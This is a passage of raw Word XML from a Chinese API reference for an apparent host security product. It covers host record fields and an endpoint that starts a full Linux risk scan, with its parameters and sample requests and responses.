          <w:p w14:paraId="5C1E9DF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D9E5151" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA24254" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A2C564D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46EFB88A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="758772DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="684E0489" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1410F8FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0754ED63" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F7ACC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55AB275A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22118D3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1663A245" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F6674A5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6023AAE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53606C1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3520423E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="319A16B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17E44FC7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1895DC0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="482786CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F6B93DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D141E89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3BDB4D3B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD54F40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E4E0872" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62A6A7BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E7E3C47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12BAAEF5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="672E9750" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="016FD1D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39D1457F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C63FBAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3567F143" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ED6ACB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CABEB47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A6DC8A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40B6870E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="25AFEA3A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F9F749F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5349FD6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="588C66F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D56CAD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>失败码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4924A601" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68B98A49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30FAFCD8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27C2BAA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="747F0D0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E015EFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="251" w:name="_Toc115166200"/>
      <w:bookmarkStart w:id="252" w:name="linux全部风险扫描"/>
      <w:bookmarkEnd w:id="218"/>
      <w:bookmarkEnd w:id="250"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>全部风险扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="251"/>
    </w:p>
    <w:p w14:paraId="35A5D598" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="253" w:name="_Toc115166201"/>
      <w:bookmarkStart w:id="254" w:name="开始linux全部风险扫描除风险文件外"/>
      <w:r>
        <w:t>开始</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>全部风险扫描(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>除风险</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>文件外)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="253"/>
    </w:p>
    <w:p w14:paraId="35FFFF36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供开始</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>全部风险扫描的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE9009" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331885CF"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linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED21630"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BC669E" w14:paraId="50359B8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CAA0DEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52E4F272" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3435E5D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12BF4E90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C2F89E6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="339CE3EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E129C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D0BBA76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75FD298A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>组范围</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="745A6CC7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16C9EC49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B7A7B0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04CF3CA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D55819F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52A76FD0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C0BFB17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AC714F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C838FE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E349791" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C796C1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59353713" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698ECA10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EAB2D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA97BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FB7CF5"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t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F59A4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2D208A"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50461A2F"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0E67BBD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C6764ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1597A880" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7627E627" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73B55416" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
